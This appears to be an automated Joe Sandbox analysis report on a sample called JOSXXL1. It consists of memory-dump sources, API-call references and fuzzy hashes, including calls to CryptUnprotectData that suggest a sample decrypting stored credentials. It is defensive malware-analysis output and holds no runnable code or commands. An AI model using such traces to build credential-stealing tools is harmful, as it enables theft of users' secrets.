                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1780285237-0
                                                                                                        • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                        • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                        • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                        • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE5
                                                                                                        • CharNextA.USER32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF6
                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 190613189-0
                                                                                                        • Opcode ID: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
                                                                                                        • Instruction ID: b93a28ad29d67f10a2270253d02d4651c85e208682c2a56c3792b5f99d5f0f7a
                                                                                                        • Opcode Fuzzy Hash: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
                                                                                                        • Instruction Fuzzy Hash: 6FF0F631104958BFC7129FA5DD00A9FBBA8EF05350B2580BAE841F7220D674DE01AF68

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:9%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:6.2%
                                                                                                        Total number of Nodes:113
                                                                                                        Total number of Limit Nodes:9

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Xoq$Xoq$Xoq$Xoq$Xoq$Xoq
                                                                                                        • API String ID: 0-1596160944
                                                                                                        • Opcode ID: 3d3714c01104eeb999fe8fbad2d64919232f7eda68326149fd9d95909e18ce08
                                                                                                        • Instruction ID: f7c2fbc4e12afc9cf2a5f728a753d4efdcc02fefd50aae7851a0686d176b6d9e
                                                                                                        • Opcode Fuzzy Hash: 3d3714c01104eeb999fe8fbad2d64919232f7eda68326149fd9d95909e18ce08
                                                                                                        • Instruction Fuzzy Hash: 0C325E6684D7D48FCB638B7848E815B7FB16B92205B8945DFC4C78B687DB28C609C362
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >B7$>B7$>B7$N
                                                                                                        • API String ID: 0-2431159481
                                                                                                        • Opcode ID: 8f26bfa3b9da2077c2c38a7136d71114949162efccc41dd004dbb7493955d45f
                                                                                                        • Instruction ID: e5043db7467698e2fb5131e445e77ec3f9b3a0f3f65bec38a1d88ed75be80760
                                                                                                        • Opcode Fuzzy Hash: 8f26bfa3b9da2077c2c38a7136d71114949162efccc41dd004dbb7493955d45f
                                                                                                        • Instruction Fuzzy Hash: 6273D631D10B5A8EDB11EF68C854AD9F7B1FF99300F51D69AE44867221EB70AAC4CF81

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 7c5555c410e7d1ba43e234787983585e155fe6ce58de739ff4211f4f30eaa5ea
                                                                                                        • Instruction ID: e49f99af54051c80e65b4d15e79872efd26976b0917d63f2b3cb991ae219140e
                                                                                                        • Opcode Fuzzy Hash: 7c5555c410e7d1ba43e234787983585e155fe6ce58de739ff4211f4f30eaa5ea
                                                                                                        • Instruction Fuzzy Hash: 5E91D774E00618CFDB14CFA9D894A9DBBF2BF89301F15C069E819AB365EB349985CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 9ddc2c7724e21cf980578eb82ef899f794239c6b0a264589031377b99850a8fb
                                                                                                        • Instruction ID: 10eca23fda33ab042648e5ff5db36d392c24bba873938b0fc0f4ec25fea75b0e
                                                                                                        • Opcode Fuzzy Hash: 9ddc2c7724e21cf980578eb82ef899f794239c6b0a264589031377b99850a8fb
                                                                                                        • Instruction Fuzzy Hash: 3D81C674E00218CFDB14DFAAD844A9DBBF2BF89301F14D06AE819AB365DB349945CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: dcb43b4af5529877e66b44e2ddd6302f8102156f023d13b0b5df64a38360e66d
                                                                                                        • Instruction ID: dedf1cd36ad829c62cd6ff139ddb072b00083ad20c903f450fc33f3d09fc741c
                                                                                                        • Opcode Fuzzy Hash: dcb43b4af5529877e66b44e2ddd6302f8102156f023d13b0b5df64a38360e66d
                                                                                                        • Instruction Fuzzy Hash: 4981B574E00218CFDB54DFAAD884A9DBBF2BF89301F14C06AE819AB365DB349945CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 98f617ac4e40d3e3df946bfa6343a3364e12889f4839ddac2aee69624234d5f4
                                                                                                        • Instruction ID: e3cf4ad5fe4a4a0edbf7aac4271ab6e609030dea97a1e046f2f0933f20bc6f7c
                                                                                                        • Opcode Fuzzy Hash: 98f617ac4e40d3e3df946bfa6343a3364e12889f4839ddac2aee69624234d5f4
                                                                                                        • Instruction Fuzzy Hash: C481C774E00218CFDB54DFAAD884A9DBBF2BF89301F14D069E819AB365DB34A945CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 0bf2b8a1e26d01a88a6ed5b80a20b1e66c45ee1676cde7f416a9fabbbd8e7540
                                                                                                        • Instruction ID: b4d08f500769f38cf2e430fa0173ae123cd69c1fc288e151f56dee3c1e3137ed
                                                                                                        • Opcode Fuzzy Hash: 0bf2b8a1e26d01a88a6ed5b80a20b1e66c45ee1676cde7f416a9fabbbd8e7540
                                                                                                        • Instruction Fuzzy Hash: 9481B574E00218CFDB14DFAAD984A9DBBF2BF89301F14D069E819AB365DB349985CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 405119af6d7c453022e60291fc1a565d5f3e245dd275fcb4e18f39d3193e763d
                                                                                                        • Instruction ID: 1ed7fafec0878c9ef7cc2f24ced5dbd21bd9f930fbec0b760c8d46a65bd049a9
                                                                                                        • Opcode Fuzzy Hash: 405119af6d7c453022e60291fc1a565d5f3e245dd275fcb4e18f39d3193e763d
                                                                                                        • Instruction Fuzzy Hash: A281B374E00218DFDB14DFAAD884A9DBBF2BF89301F14D069E819AB365DB349985CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: fd1d53afb33268dba9f4fcd76a3965ca308c130d176310e999cb6e7aa47cf83f
                                                                                                        • Instruction ID: d948ce80f45799b9855637bb85a374c5dc186661696ccfd3798672c57cbdc26b
                                                                                                        • Opcode Fuzzy Hash: fd1d53afb33268dba9f4fcd76a3965ca308c130d176310e999cb6e7aa47cf83f
                                                                                                        • Instruction Fuzzy Hash: 1E81E574E00218CFDB14DFAAD984A9DBBF2BF88305F14D06AE819AB365DB349945CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: f80c0f65ab550ba9ec293594b546fce422d52b1ac01e4d9d00961fe2e22f767c
                                                                                                        • Instruction ID: 858c17a10d5cab686d967b46e2e7e44e6365e7f336a9b09326f2e35c4f120938
                                                                                                        • Opcode Fuzzy Hash: f80c0f65ab550ba9ec293594b546fce422d52b1ac01e4d9d00961fe2e22f767c
                                                                                                        • Instruction Fuzzy Hash: 6481B574E00618CFDB14DFAAD984A9DBBF2BF89301F14C069E819AB365DB349985CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (okq$4'kq$4'kq$4'kq
                                                                                                        • API String ID: 0-323808577
                                                                                                        • Opcode ID: 6bd0ca61d7e3c28b12529934258c8bea049d60db6544d02b67b7207718c68c52
                                                                                                        • Instruction ID: f910d8d03ede18e1d3519cd1cc87da67b13ab752ceb405a5af751a5da40829fc
                                                                                                        • Opcode Fuzzy Hash: 6bd0ca61d7e3c28b12529934258c8bea049d60db6544d02b67b7207718c68c52
                                                                                                        • Instruction Fuzzy Hash: 78A28230640209CFCB15CFA8C994AAEBBF2BF88301F558659E815DF261D735ED89CB52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (okq$(okq$,oq$,oq
                                                                                                        • API String ID: 0-2865278577
                                                                                                        • Opcode ID: 0f43b1f8deaeb86d259a51c8e563369066274d4a5fc3a6937aabfe4437d6ad64
                                                                                                        • Instruction ID: 5c0a0dd2f417461ef25efc83db7e9ac4c9e6f54c9214fe982a7469291cbcfb0e
                                                                                                        • Opcode Fuzzy Hash: 0f43b1f8deaeb86d259a51c8e563369066274d4a5fc3a6937aabfe4437d6ad64
                                                                                                        • Instruction Fuzzy Hash: CE025030A04219DFCB15CF68E885AADBBF2BF49311F158069EC25EB2A1D730DD89CB51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (okq$Hoq
                                                                                                        • API String ID: 0-4134915641
                                                                                                        • Opcode ID: 6584a81e85578d67077be0abdf285c66e25fe4e107f472eacf4c30d6ec48c36a
                                                                                                        • Instruction ID: cabcb044c0ddc5b9f5704c8dd06a1381dedf86cab483e66757db4f1c4f87c5d1
                                                                                                        • Opcode Fuzzy Hash: 6584a81e85578d67077be0abdf285c66e25fe4e107f472eacf4c30d6ec48c36a
                                                                                                        • Instruction Fuzzy Hash: D8126F70B00219CFDB14DF69C954AAEBBF6BF88301F208569E859DB3A5DB309D45CB90
                                                                                                        APIs
                                                                                                        • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39D78F5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptDataUnprotect
                                                                                                        • String ID:
                                                                                                        • API String ID: 834300711-0
                                                                                                        • Opcode ID: e32585f787ba08ced7d295733baaefcd4bf2858c45e6d6f93a34b9567a31de57
                                                                                                        • Instruction ID: e0cb21f74cda8075862a86ba68d15ff6b12c610a54e4950cd37dd44fd1204e5b
                                                                                                        • Opcode Fuzzy Hash: e32585f787ba08ced7d295733baaefcd4bf2858c45e6d6f93a34b9567a31de57
                                                                                                        • Instruction Fuzzy Hash: 111156B2800209AFDB10CF99C945BEEBFF5EF48320F14841AE958A7210C339A590DFA5
                                                                                                        APIs
                                                                                                        • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39D78F5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptDataUnprotect
                                                                                                        • String ID:
                                                                                                        • API String ID: 834300711-0
                                                                                                        • Opcode ID: 8519baf19b9feebf4524b3b994a83b52344a98bd05d213587afdcc2baf68e871
                                                                                                        • Instruction ID: 076e488983ba405cb63e10fd1d6e77695ce944afb76b57f00dbada72099aa1d6
                                                                                                        • Opcode Fuzzy Hash: 8519baf19b9feebf4524b3b994a83b52344a98bd05d213587afdcc2baf68e871
                                                                                                        • Instruction Fuzzy Hash: BD1144B2800309AFDB10CF99C945BDEBBF5EF48320F108419E558A7610C775A550DFA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `([7
                                                                                                        • API String ID: 0-3452837591
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `([7
                                                                                                        • API String ID: 0-3452837591
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 82d8837216a25df4ffafad341884886f7b265ae34365781faaf156956d3f0dc6
                                                                                                        • Instruction ID: 5d5110f3479aa9e066a6f82986a67463ed304fe0404a3653d0de9287ac550b22
                                                                                                        • Opcode Fuzzy Hash: 82d8837216a25df4ffafad341884886f7b265ae34365781faaf156956d3f0dc6
                                                                                                        • Instruction Fuzzy Hash: 90819E74E01218DFDB14DFE9C990ADDBBB2BB89300F209169D815BB368DB359946CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f2a0f3b62550ea5d0b7f15f9d6242f9ef135c6132699d02d25c1fab0936c8204
                                                                                                        • Instruction ID: b757846d767b645e56a7025a8a905a2e5c396e6fa7b1e98e6fb6f97e387d2ed2
                                                                                                        • Opcode Fuzzy Hash: f2a0f3b62550ea5d0b7f15f9d6242f9ef135c6132699d02d25c1fab0936c8204
                                                                                                        • Instruction Fuzzy Hash: D8819E74E01218CFDB14DFE9C990ADDBBB2BB89300F20956AD415BB368DB359986CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9252fa1f15e20f9fb2322a376284b4eabfa58cce8c1235468ee1958b26cea332
                                                                                                        • Instruction ID: 6c3e55b2fb27beaa420469bfd84057aff2c5783ba09a048ff470c4a4d91735f3
                                                                                                        • Opcode Fuzzy Hash: 9252fa1f15e20f9fb2322a376284b4eabfa58cce8c1235468ee1958b26cea332
                                                                                                        • Instruction Fuzzy Hash: BE81AE74E01218CFDB14DFA9C980ADDBBB2BF89300F209569D815BB368EB359946CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fec676789bf011712b06a97736f37bc48894256e3a118c3ef8ca7858fe135d05
                                                                                                        • Instruction ID: e296c055e24b1eada4c3d13b4926b87b08611079c82dcebbaf45e5c44db0fdc2
                                                                                                        • Opcode Fuzzy Hash: fec676789bf011712b06a97736f37bc48894256e3a118c3ef8ca7858fe135d05
                                                                                                        • Instruction Fuzzy Hash: 9D81BD74E11218CFDB04DFA9D980ADDBBB2BF89300F209169E804BB368DB359946CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dfb226eb1bc0ce346cb3db4c65d9e26014ef15185bad59f61d51b98e51d373e9
                                                                                                        • Instruction ID: 206a1f5f02931797e3044bfb0aa2416afd21cc7756b37c6347fedc0f59ee6eca
                                                                                                        • Opcode Fuzzy Hash: dfb226eb1bc0ce346cb3db4c65d9e26014ef15185bad59f61d51b98e51d373e9
                                                                                                        • Instruction Fuzzy Hash: 0F7195B5D016188FEB68CF6AC944BDEBBF2AF88300F14C1AAD409A7254DB745A85CF11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5f55e8d56699510bb16dc2cf006621c3658e219709596d65a49a26d607d1deb3
                                                                                                        • Instruction ID: 409d73eacc0fb99685498e2e50d2ea37aa25aa5151220a27437c5ebf14a8de67
                                                                                                        • Opcode Fuzzy Hash: 5f55e8d56699510bb16dc2cf006621c3658e219709596d65a49a26d607d1deb3
                                                                                                        • Instruction Fuzzy Hash: 4B518B70D082488BDB25CFAAD8D42DDBBB2BF89300F54D1AAC414BB256EB359946CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
